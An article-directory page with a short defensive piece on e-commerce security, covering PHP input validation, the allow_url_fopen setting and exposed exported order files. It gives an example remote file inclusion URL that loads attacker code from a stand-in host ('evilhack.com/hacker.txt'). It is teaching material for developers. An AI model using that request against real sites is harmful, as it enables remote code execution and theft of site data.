Ecommerce Article

E-Commerce Security - Plugging the Security Holes

By Expert Author: Paul Roberts

Word Count: 520 words | Views: 302 view(s)

Security in an e-commerce website needs to be a major consideration when developing an e-commerce website or software. A developer needs to be aware of all the security considerations when designing a site. With e-commerce becoming more commonplace these days, the number of security attacks is certainly increasing. Paranoia is a healthy thing for e-commerce site developers, we need to keep up to gate with security issues, and keep our ears and eyes open. Though the following loopholes are serious, the following loopholes if present are easily fixed.

Listed below are some security considerations to be included when developing a site. This article does not cover e-shoplifting, please see my separate article on this.

User input - every input, whether it be entering a quantity, searching for a product, entering a name etc, needs to be validated for suspicious characters. If this is not done, it is possible to enter “?>”, the closing end tags of PHP and execute some PHP code.

It is far safer allow numbers and characters a-z (capitals included) and 0-9 and nothing else, rather than make a list of all the character that shouldn’t be there. The validation script needs to scroll through each character one by one. This needs to be achieved using in server side validation, not Javascript. Using server side input validation is essential to keep out unwanted characters

There exists another major when executing PHP code. When using PHP there is a setting called allow_url_fopen which enables the opening of files from a PHP script. This setting should be turned off, unless absolutely necessary.

Just imagine you have PHP scripts for both fixed headers and footers, and to access your webpages you would type in http://www.mysite.com/index.php?page=page2. All it takes is a malicious user to run a script by modifying these parameters by typing in “http:// www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt” with some PHP code in the file “hacker.txt”. You could have anything happen, PHP files read, deleted, vital information stolen.

If you are not sure if this setting is on or off, please copy the following PHP code into a text file, and upload it to your web server:

phpinfo();
?>

When you access your script on your webserver, you should come across the setting allow_url_fopen under configuration.

A computer user, under normal circumstances cannot find the value of this setting.

Be careful of exported data like orders, products in CSV and mySQL files. If this data is exported from a script and is kept on the web server under a common file name ie. http://www.mysite.com/admin/output_tables.csv. This is only really a problem when the exported data resides in a file in a directory that is publicly accessible. There is two ways to prevent this security loophole - First have the output file behind a password protected directory, secondly have the data located inside a HTML textarea form element on a script. The storeowner can then copy this information from the textfile and create a new file on their computer and paste the information here.

All it takes is a hacker to find this filename by checking out the e-commerce software’s demo website and look for the same filename on a real site.

About the Author: Paul Roberts

Paul Roberts
I run a software development company specialising in E-Commerce, Search Engine Optimization, and Print Estimation software called ROBO Design Solutions. I also develop New Zealand E-Commerce Solutions and Software under the name ROBO Design.

Article Source: http://www.articlesphere.com/Article/E-Commerce-Security---Plugging-the-Security-Holes/145459

Article Tags: e-commerce, ecommerce, security, loophole, loopholes, plugging, secure, validation

This Article has been viewed 302 times.

Related Videos
Play Video How to Prevent Credit Card Fraud	Play Video Facebook's Loophole and Other Tech News	Play Video How Secure is Social Security	Play Video Inexpensive Home Security Camera System	Play Video How to Minimize Airport Security Hassles

Listed below are more articles related to the above article from the "Ecommerce" article category.

People interested in the above article "E-Commerce Security - Plugging the Security Holes" are also interested in the related articles listed below:

Prestashop - a new term in ecommerce

Prestashop is basically an open source ecommerce shopping cart software solution that is applicable in this Web 2.0 era. This software is written in PHP and it is free of cost. It is the best solution for those who prefer to do their business online. It is considered to be one of the speedy, lightweight solutions as a result downloading, installation can be done easily. Prestashop has appeared to be innovative and excellent solutions for all types of enterprises. There are certain technical requirements for Prestashop such as Apache web server 1.3, PHP 5, MySQL 5, Linux or Unix. Prestashop users can make benefit from this solution as it is reliable, flexible and can handle a large sum of order per day.

How to save yourself from eCommerce Frauds

Ecommerce fraud is being a common phrase these days. Though introduction of Ecommerce brings a revolutionary change in the life of a businessman and customers, online trading also carries some unethical activities such as internet fraud and hackers attack. Merchants and consumers both can fall victim to fraudsters. Things on internet are not as easy as they seem.

Future of Ecommerce in India

E-commerce or Electronic commerce has given a new dimension to business activities, particularly in a developing country like India. It involves buying and selling of goods and services all around the world. Ecommerce solutions have paved the way for nurturing businessman craving for success and also helped customers across the world to buy products online without any apprehensions.

Online Payment Gateway Comparison: PayPal or Google Checkout

Online payment gateway is the method to electronically transfer money. Ecommerce websites has made online payment gateways a subject of major interest. With the aid of these gateways, online customers can make payments and transfer fund across the world. PayPal and Google Checkout are two popular online payment gateways that operate as a transfer mediator between a merchant and a buyer.

How To Shop Online With Internet Escrow

If you frequently order merchandise online, you may be exposed to the risk of becoming a victim of online fraud. This is especially true if you regularly buy at auction sites or independently-owned online marketplaces. While security procedures for online transactions are getting better all the time, crooks and con artists are getting more sophisticated in their approaches to fraud. They also have great ability in compromising new protective measures to dupe you into thinking your transaction is secure.

What is the History of the eCommerce and the Web Development Application?

In the past, there were many difficulties for the people of different regions regarding the commerce. Long way back, the only medium which was the source of attaining the information about the particular things and it is the source of getting the knowledge about the different things which you would love to know. But with the passage of time, the scope of getting information has widen to many other facilities and today the internet is not only limited to get the information about the specific thing but there are also lots of ways of earning through the facility of internet.

The 5 Step Pricing Strategy

The 4Ps of the marketing mix, according to the 1960s'marketer E. Jerome McCarthy are product, price, place and promotion. Of all of these vital elements, price has to be the most important as your pricing strategy will most likely have the biggest impact on your bottom line. Defining the right strategy for your products is no easy task though as there are many different factors to consider. Below is a pricing strategy designed to help you find the right price for your products...

Print Article

Favorite Article

Email to Friend

Republish Article

Article Directory Home

All Categories

Internet And E-Business

Ecommerce

E-Commerce Security - Plugging the Security Holes

Can't find what you're looking for? Try Google Search!

(We serve worldwide - Locations updated as at Sunday, 12 February 2012 06:10 pm , Singapore)

United States of America, USA . United Kingdom, UK (England, Scotland, Wales, Northern Ireland) . Canada . Afghanistan . Albania . Algeria . American Samoa . Andorra . Angola . Anguilla . Antarctica . Antigua & Barbuda . Argentina . Armenia . Aruba . Australia . Austria . Azerbaijan . Bahamas . Bahrain . Bangladesh . Barbados . Belarus . Belgium . Belize . Benin . Bermuda . Bhutan . Bolivia . Bonaire . Bosnia-Herzegovina . Botswana . Brazil . British Virgin Islands . Brunei Darrusalam . Bulgaria . Burkina Faso . Burundi . Cambodia . Cameroon . Cape Verde . Cayman Islands . Central African Republic . Chad . Channel Islands . Chile . China . Christmas Island . Colombia . Comoros . Congo . Congo (Dem. Rep.) . Cook Islands . Costa Rica . Cote d'Ivoire . Croatia . Cuba . Curacao . Cyprus . Czech Republic . Denmark . Djibouti . Dominica . Dominican Republic . East Timor . Ecuador . Egypt . El Salvador . Equatorial Guinea . Eritrea . Estonia . Ethiopia . Falkland Islands and Dependencies . Faroe Islands . Fiji . Finland . France . French Guiana . French Polynesia . Gabon . Gambia . Gaza . Georgia . Germany . Ghana . Gibraltar . Greece . Greenland . Grenada . Guadeloupe . Guam . Guatemala . Guinea . Guinea-Bissau . Guyana . Haiti . Hawaiian Islands . Honduras . Hong Kong . Hungary . Iceland . India . Indonesia . Iran . Iraq . Isle Of Man . Israel . Italy . Ivory Coast . Jamaica . Japan . Johnston Atoll . Jordan . Kazakhstan . Kenya . Kiribati . Korea (North) . Korea (South) . Kuwait . Kyrgyzstan . Laos . Latvia . Lebanon . Leeward Islands . Lesotho . Liberia . Libya . Liechtenstein . Lithuania . Luxembourg . Macau . Macedonia . Madagascar . Malawi . Malaysia . Maldives . Mali . Malta . Marshall Islands . Martinique . Mauritania . Mauritius . Mexico . Micronesia (Federated States) . Midway Islands . Moldova . Monaco . Mongolia . Montserrat . Morocco . Mosquito Coast . Mozambique . Myanmar (Burma) . Namibia . Nauru . Navassa Island . Nepal . Netherlands . Netherlands Antilles . New Caledonia . New Zealand . Nicaragua . Niger . Nigeria . Niue . Norfolk Island . Northern Mariana Islands . Norway . Oman . Pakistan . Palau . Palestine . Panama . Papua New Guinea . Paracel Islands . Paraguay . Peru . Philippines . Pitcairn Islands . Poland . Portugal . Puerto Rico . Qatar . Reunion . Romania . Russia . Rwanda . Ryukyu Islands . Saint Helena . Saint Kitts and Nevis . Saint Lucia . Saint Pierre & Miquelon . Saint Vincent & The Grenadines . Samoa . San Marino . Sao Tome & Principe . Saudi Arabia . Senegal . Serbia . Seychelles . Sierra Leone . Singapore . Slovakia . Slovenia . Solomon Islands . Somalia . South Africa . Spain . Sri Lanka . Sudan . Suriname . Swaziland . Sweden . Switzerland . Syria . Taiwan . Tajikistan . Tanzania . Thailand . Togo . Tonga . Transkei . Trinidad & Tobago . Tunisia . Turkey . Turkmenistan . Turks and Caicos Islands . Tuvalu . US Virgin Islands . Uganda . Ukraine . United Arab Emirates . Upper Volta . Uruguay . Uzbekistan . Vanuatu . Vatican City (Holy See) . Venezuela . Vietnam . Wake Island . Windward Islands . Yemen . Yugoslavia . Zaire . Zambia . Zimbabwe

Copyright © 2005 - by Larry Lim, Singapore - Article Search Engine Directory at ArticleSphere.com™
All Rights Reserved Worldwide. All Trademarks and Servicemarks are the property of the respective owners.

E-Commerce Security - Plugging the Security Holes

Related Videos

Related Articles